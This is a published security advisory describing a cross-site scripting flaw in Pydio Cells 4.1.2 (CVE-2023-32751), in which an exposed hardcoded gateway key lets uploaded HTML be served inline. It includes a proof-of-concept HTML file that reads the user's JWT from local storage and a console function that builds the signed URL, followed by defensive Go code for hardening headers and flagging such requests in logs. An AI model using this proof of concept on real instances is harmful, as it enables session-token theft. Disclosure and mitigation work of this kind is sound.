Exploit Title: Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download
Affected Versions: 4.1.2 and earlier versions
Fixed Versions: 4.2.0, 4.1.3, 3.0.12
Vulnerability Type: Cross-Site Scripting
Security Risk: high
Vendor URL: https://pydio.com/
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2023-004
Advisory Status: published
CVE: CVE-2023-32751
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32751

Introduction
============

"Pydio Cells is an open-core, self-hosted Document Sharing and Collaboration
platform (DSC) specifically designed for organizations that need advanced
document sharing and collaboration without security trade-offs or compliance
issues."

(from the vendor's homepage)

More Details
============

When a file named "xss.html" is downloaded in the Pydio Cells web
application, a download URL similar to the following is generated:

https://example.com/io/xss/xss.html
    ?AWSAccessKeyId=gateway
    &Expires=1682495748
    &Signature=920JV0Zy%2BrNYXjak7xksAxRpRp8%3D
    &response-content-disposition=attachment%3B%20filename%3Dxss.html
    &pydio_jwt=qIe9DUut-OicxRzNVlynMf6CTENB0J-J[...]

The URL is akin to a presigned URL as used by the Amazon S3 service. It
contains the URL parameter "response-content-disposition" which is set to
"attachment", causing the response to contain a "Content-Disposition" header
with that value. Therefore, the browser downloads the file instead of
interpreting it. The URL also contains a signature and expiry timestamp,
which are checked by the backend. Unlike a presigned URL as used by S3, the
URL also contains the parameter "pydio_jwt" with the JWT of the user for
authentication.
Furthermore, the access key with the ID "gateway" is referenced, which can be
found in the JavaScript sources of Pydio Cells together with the secret:

------------------------------------------------------------------------
_awsSdk.default.config.update({
    accessKeyId: 'gateway',
    secretAccessKey: 'gatewaysecret',
    s3ForcePathStyle: !0,
    httpOptions: {
        timeout: PydioApi.getMultipartUploadTimeout()
    }
});
------------------------------------------------------------------------

With this information it is possible to change the URL parameter
"response-content-disposition" to the value "inline" and then calculate a
valid signature for the resulting URL. Furthermore, the content type of the
response can be changed to "text/html" by also adding the URL parameter
"response-content-type" with that value. This would result in a URL like the
following for the previously shown example URL:

https://example.com/io/xss/xss.html
    ?AWSAccessKeyId=gateway
    &Expires=1682495668
    &Signature=HpKue0YQZrnp%2B665Jf1t7ONgfRg%3D
    &response-content-disposition=inline
    &response-content-type=text%2Fhtml
    &pydio_jwt=qIe9DUut-OicxRzNVlynMf6CTENB0J-J[...]

Upon opening the URL in a browser, the HTML included in the file is
interpreted and any JavaScript code is run.

Proof of Concept
================

Upload an HTML file into an arbitrary location of a Pydio Cells instance,
for example with the following contents:

------------------------------------------------------------------------
<html>
<body>
<h1>Cross-Site Scripting</h1>
<script>
    let token = JSON.parse(localStorage.token4).AccessToken;
    alert(token);
</script>
</body>
</html>
------------------------------------------------------------------------

The contained JavaScript code reads the JWT access token for Pydio Cells from
the browser's local storage object and opens a message box. Instead of just
displaying the JWT, it could also be sent to an attacker.
The following JavaScript function can then be run within the browser's
developer console to generate a presigned URL for the HTML file:

------------------------------------------------------------------------
async function getPresignedURL(path) {
    let client = PydioApi.getClient();
    let node = new AjxpNode(path);
    let metadata = {
        Bucket: "io",
        ResponseContentDisposition: "inline",
        Key: path,
        ResponseContentType: "text/html"
    };
    let url = await client.buildPresignedGetUrl(node, null, "text/html", metadata);
    return url;
}

await getPresignedURL("xss/xss.html");
------------------------------------------------------------------------

The code has to be run in the context of Pydio Cells while being logged in.
If the resulting URL is opened in a browser, the JavaScript code contained in
the HTML file is run.

If the attack is conducted in the described way, the JWT of the attacker is
exposed through the URL. However, this can be circumvented by first
generating a public URL for the file and then constructing the presigned URL
based on the resulting download URL.

Workaround
==========

No workaround known.

Fix
===

Upgrade Pydio Cells to a version without the vulnerability.

Security Risk
=============

Attackers that can upload files to a Pydio Cells instance can construct URLs
that execute arbitrary JavaScript code in the context of Pydio Cells upon
opening. This could for example be used to steal the authentication tokens
of users opening the URL. It is likely that such an attack succeeds, since
sharing URLs to files hosted using Pydio Cells is a common use case of the
application. Therefore, the vulnerability is estimated to pose a high risk.
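The root cause described above is that the gateway lets the signed URL's
"response-content-disposition" and "response-content-type" parameters
override how an uploaded file is served. The following Go code is an added
example written for this advisory; it is not Pydio's code and makes no claim
about how the vendor's fix is implemented. It assumes a hypothetical gateway
handler that knows the object key and the content type recorded at upload
time, and shows one hardening policy (ignore the caller's content type, force
"attachment" unless the stored type is in a constructed allowlist of types
that render without script, add "nosniff") next to a log-side check that
flags requests asking for active content to be rendered inline. The
allowlists, the query strings and the placeholder signature/JWT values are
constructed for the example.

```go
package main

import (
	"fmt"
	"net/url"
	"path"
	"strings"
)

// DownloadHeaders holds the response headers the (hypothetical) gateway emits
// for a signed download URL after the caller-supplied overrides are filtered.
type DownloadHeaders struct {
	ContentType         string
	ContentDisposition  string
	XContentTypeOptions string
}

// inlineSafeTypes lists media types browsers render without executing script.
// Constructed allowlist for this example; anything else is forced to download.
var inlineSafeTypes = map[string]bool{
	"image/png":       true,
	"image/jpeg":      true,
	"image/gif":       true,
	"application/pdf": true,
	"text/plain":      true,
}

// activeContentTypes are types that execute script when rendered inline.
var activeContentTypes = map[string]bool{
	"text/html":             true,
	"application/xhtml+xml": true,
	"image/svg+xml":         true,
	"text/xml":              true,
	"application/xml":       true,
}

// HardenDownloadHeaders derives response headers from the object key, the
// content type recorded at upload time and the signed URL's query string.
// The caller's response-content-type is ignored entirely, and
// response-content-disposition=inline is honoured only for inline-safe types.
func HardenDownloadHeaders(objectKey, storedContentType, rawQuery string) (DownloadHeaders, error) {
	q, err := url.ParseQuery(rawQuery)
	if err != nil {
		return DownloadHeaders{}, fmt.Errorf("parse query: %w", err)
	}
	ct := strings.ToLower(strings.TrimSpace(storedContentType))
	if ct == "" {
		ct = "application/octet-stream"
	}
	// The filename comes from the stored key, not from the URL, and is
	// stripped of characters that could break or extend the header value.
	name := strings.NewReplacer("\"", "", "\r", "", "\n", "", ";", "").Replace(path.Base(objectKey))

	disposition := "attachment"
	wantInline := strings.HasPrefix(strings.ToLower(q.Get("response-content-disposition")), "inline")
	if wantInline && inlineSafeTypes[ct] {
		disposition = "inline"
	}
	return DownloadHeaders{
		ContentType:         ct,
		ContentDisposition:  fmt.Sprintf("%s; filename=\"%s\"", disposition, name),
		XContentTypeOptions: "nosniff",
	}, nil
}

// IsSuspiciousDownloadQuery flags a signed URL whose query asks the gateway to
// render the object inline as active content, the pattern this advisory
// describes. Intended to be run over gateway access logs.
func IsSuspiciousDownloadQuery(rawQuery string) bool {
	q, err := url.ParseQuery(rawQuery)
	if err != nil {
		return false
	}
	disp := strings.ToLower(strings.TrimSpace(q.Get("response-content-disposition")))
	ct := strings.ToLower(strings.TrimSpace(q.Get("response-content-type")))
	// Drop any ";charset=..." parameter before comparing the media type.
	if i := strings.Index(ct, ";"); i >= 0 {
		ct = strings.TrimSpace(ct[:i])
	}
	return strings.HasPrefix(disp, "inline") && activeContentTypes[ct]
}

func main() {
	// Constructed query strings modelled on the advisory's two URLs; the
	// signature and JWT values are placeholders.
	benign := "AWSAccessKeyId=gateway&Expires=1682495748&Signature=PLACEHOLDER" +
		"&response-content-disposition=attachment%3B%20filename%3Dxss.html&pydio_jwt=PLACEHOLDER"
	malicious := "AWSAccessKeyId=gateway&Expires=1682495668&Signature=PLACEHOLDER" +
		"&response-content-disposition=inline&response-content-type=text%2Fhtml&pydio_jwt=PLACEHOLDER"

	for _, rq := range []string{benign, malicious} {
		h, _ := HardenDownloadHeaders("xss/xss.html", "text/html", rq)
		fmt.Printf("suspicious=%v %+v\n", IsSuspiciousDownloadQuery(rq), h)
	}
}
```

With this policy the advisory's second URL still serves the uploaded
"text/html" object, but as an attachment with "nosniff", so the browser
saves it rather than rendering it in the application's origin; a PNG
requested inline is still served inline because its stored type is on the
allowlist.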
Timeline
========

2023-03-23 Vulnerability identified
2023-05-02 Customer approved disclosure to vendor
2023-05-02 Vendor notified
2023-05-03 CVE ID requested
2023-05-08 Vendor released fixed version
2023-05-14 CVE ID assigned
2023-05-16 Vendor asks for a few more days before the advisory is released
2023-05-30 Advisory released

References
==========

[1] https://aws.amazon.com/sdk-for-javascript/

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a team of
specialised IT-security experts. Hereby, security weaknesses in company
networks or products are uncovered and can be fixed immediately.

As there are only a few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public security
advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/

Working at RedTeam Pentesting
=============================

RedTeam Pentesting is looking for penetration testers to join our team in
Aachen, Germany. If you are interested please visit:
https://jobs.redteam-pentesting.de/

--
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Alter Posthof 1                           Fax : +49 241 510081-99
52062 Aachen                              https://www.redteam-pentesting.de
Germany                                   Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen